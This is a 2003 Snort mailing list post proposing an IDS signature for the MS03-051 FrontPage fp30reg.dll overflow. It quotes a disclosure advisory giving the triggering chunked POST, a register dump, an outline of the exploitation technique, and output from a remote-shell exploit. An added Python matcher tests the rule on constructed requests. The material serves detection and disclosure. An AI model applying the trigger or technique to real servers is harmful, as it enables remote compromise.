[Snort-sigs] Sig for MS03-051

Frank Knobbe frank at ...1978...
Wed Nov 12 10:55:09 EST 2003

Does this look acceptable?

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS \
(msg:"WEB-FRONTPAGE Chunked Transfer-Encoding Post"; \
flow:to_server,established; uricontent:"/_vti_bin/_vti_aut"; \
content:"Transfer-Encoding\:"; nocase; content:"chunked"; nocase; \
reference:url,www.microsoft.com/technet/security/bulletin/ms03-051.asp; \
rev:1; sid:11111111111;)

It's a sig attempt for:
= Frontpage Extensions Remote Command Execution
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/bulletin/ms03-051.asp
= Affected Software:
=       Microsoft Windows 2000 Service Pack 2, Service Pack 3 
=       Microsoft Windows XP, Microsoft Windows XP Service Pack 1 
=       Microsoft Office XP, Microsoft Office XP Service Release 1 
= Public disclosure on November 11, 2003

Continuing 'The Methodical Approach To Finding Overflows' we moved to
the next attack avenue. After the success against nsiislog.dll we were
again greeted by an access violation message leading to the discovery
of another remote vulnerability.

== Description ==

Sending a chunked-encoded POST to fp30reg.dll will cause an access
violation, resulting in the following error log.

Event Type:     Warning
Event Source:   W3SVC
Event Category: None
Event ID:       37
Out of process application '/LM/W3SVC/1/ROOT' terminated unexpectedly. 

A chunked-encoded POST will result in the control of ECX and EDI, with
the exception occurring at a mov dword ptr [ECX+4],EDI instruction,
leading to remote command execution with privileges associated with the
IWAM_machinename account.

== Chunked Transfer-Encoding Post ==

POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1
Transfer-Encoding: chunked


== Exploitation ==

[Code Segment]
 67D46AD3 mov ecx,dword ptr [ebx+edx+8]
 67D46AD7 mov edi,dword ptr [ebx+edx+4]
 67D46ADB mov dword ptr [ecx+4],edi

 EAX = 046F83E8 EBX = 00000010 ECX = 58585858           
 EDX = 05450FEC ESI = 0000000C EDI = 58585858           
 EIP = 67D46ADB ESP = 0120F648 EBP = 0120F668

 05450FEC  11 00 00 00 58 58 58  ....XXX
 05450FF3  58 58 58 58 58 58 58  XXXXXXX
 05450FFA  58 58 58 58 58 58 58  XXXXXXX
 05451001  58 58 58 58 58 58 58  XXXXXXX
 05451008  58 58 58 58 58 58 58  XXXXXXX
 0545100F  58 58 58 58 58 58 58  XXXXXXX
 05451016  58 58 58 58 58 58 58  XXXXXXX

There are many different ways to exploit this malloc/free scenario, so
instead of the usual SEH redirect to a JMP instruction, we took a two-step
approach for higher reliability.

At the first exception error we are in control of ECX and EDI allowing
us to write our JMP instruction to a known writeable space. This does
not cause an exception and execution flow continues through to a CALL
instruction that uses a value from our buffer. We use this CALL to
reach our JMP instruction.

== Exploit Example ==


** FP30REG.DLL - Ver - Remote Shell **

. Calling Home: blackhole:2000
. Using: 0x---------h as writeable data space 
. Shellcode Size: 304 bytes
. Preparing Exploit Buffer......Ready
. Starting Listener On Port: 2000
. Connecting To
. Sending Exploit......Exploit Sent
. Connection Received

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.

== Solutions ==

- Every day is a 0-day day on the Internet. Limiting the avenues of attack
  can be a key factor in reducing the risk to a web server. Programs such
  as secureIIS and URLscan should be set up to reduce the number of
  that can be used to send data to a server. Removing unnecessary
  files and ISAPI extensions reduces the number of listeners that data can
  be fed to, limiting the number of vulnerabilities that a server is
  susceptible to.
- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft January 30, 2003 by Brett Moore of

== About Security-Assessment.com ==

Security-Assessment.com is a leader in intrusion testing and security
code review, and leads the world with SA-ISO, online ISO17799 compliance
management solution. Security-Assessment.com is committed to security
research and development, and its team have previously identified a
number of vulnerabilities in public and private software vendors

Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
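To check the proposed signature's logic against concrete requests, here is an added Python matcher. It is example code written for this page, not from the original post, the advisory, or the Snort project. It reproduces the rule's three conditions the way Snort applies them (uricontent against the request URI, each content:/nocase independently against the whole payload) and adds a stricter header-only variant, `header_matches`, to show one way the rule as written can fire on a request that is not actually chunked. All sample requests are constructed for the example.

```python
"""
Matcher reproducing the proposed Snort rule for MS03-051 over raw HTTP
requests.  Added illustration; not part of the original post or advisory.
All sample requests below are constructed, not captured traffic.
"""
from __future__ import annotations

# The three patterns from the proposed rule.
URI_PATTERN = b"/_vti_bin/_vti_aut"     # uricontent: (case-sensitive)
HEADER_PATTERN = b"transfer-encoding:"  # content:"Transfer-Encoding:"; nocase
VALUE_PATTERN = b"chunked"              # content:"chunked"; nocase


def split_request(raw: bytes) -> tuple[bytes, bytes, bytes]:
    """Return (method, request-URI, header block) of an HTTP/1.x request."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    request_line, _, headers = head.partition(b"\r\n")
    parts = request_line.split(b" ")
    if len(parts) < 2:
        raise ValueError("malformed request line")
    return parts[0], parts[1], headers


def sig_matches(raw: bytes) -> bool:
    """The proposed rule as written: uricontent against the URI, and each
    content:/nocase anywhere in the payload, independently of each other.
    flow:to_server,established is taken as satisfied because only client
    requests are fed in."""
    _method, uri, _headers = split_request(raw)
    payload = raw.lower()
    return (URI_PATTERN in uri
            and HEADER_PATTERN in payload
            and VALUE_PATTERN in payload)


def header_matches(raw: bytes) -> bool:
    """Stricter variant (not part of the proposed rule): require a real
    Transfer-Encoding header whose value contains 'chunked'."""
    _method, uri, headers = split_request(raw)
    if URI_PATTERN not in uri:
        return False
    for line in headers.split(b"\r\n"):
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"transfer-encoding":
            if b"chunked" in value.lower():
                return True
    return False


# Constructed samples.  The first mirrors the shape of the advisory's
# request: a chunked POST to fp30reg.dll carrying a run of 'X' bytes.
ADVISORY_STYLE_POST = (
    b"POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n"
    b"Host: target\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"11\r\n" + b"X" * 17 + b"\r\n0\r\n\r\n"
)
PLAIN_GET = (
    b"GET /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n"
    b"Host: target\r\n\r\n"
)
CHUNKED_OTHER_URI = (
    b"POST /upload.asp HTTP/1.1\r\n"
    b"Host: target\r\n"
    b"transfer-encoding: CHUNKED\r\n\r\n"
    b"0\r\n\r\n"
)
_BODY = b"note=Transfer-Encoding: chunked is bad"
BODY_ONLY_MENTION = (
    b"POST /_vti_bin/_vti_aut/author.dll HTTP/1.1\r\n"
    b"Host: target\r\n"
    b"Content-Length: %d\r\n\r\n" % len(_BODY)
) + _BODY

SAMPLES = {
    "advisory_style_post": ADVISORY_STYLE_POST,
    "plain_get_to_vti_aut": PLAIN_GET,
    "chunked_post_other_uri": CHUNKED_OTHER_URI,
    "strings_only_in_body": BODY_ONLY_MENTION,
}


def run_samples() -> dict[str, tuple[bool, bool]]:
    """Map sample name -> (rule-as-written result, header-only result)."""
    return {name: (sig_matches(req), header_matches(req))
            for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (loose, strict) in run_samples().items():
        print(f"{name:24s} rule-as-written={loose!s:5s} header-only={strict}")
```

The last sample is the point of the stricter variant: because the two content: matches are independent and unanchored, a non-chunked POST to the same directory whose body merely contains the strings "Transfer-Encoding:" and "chunked" trips the rule as written, while `header_matches` does not fire. Note also that neither the rule nor the matcher pins the method to POST; a chunked GET to the same URI matches both.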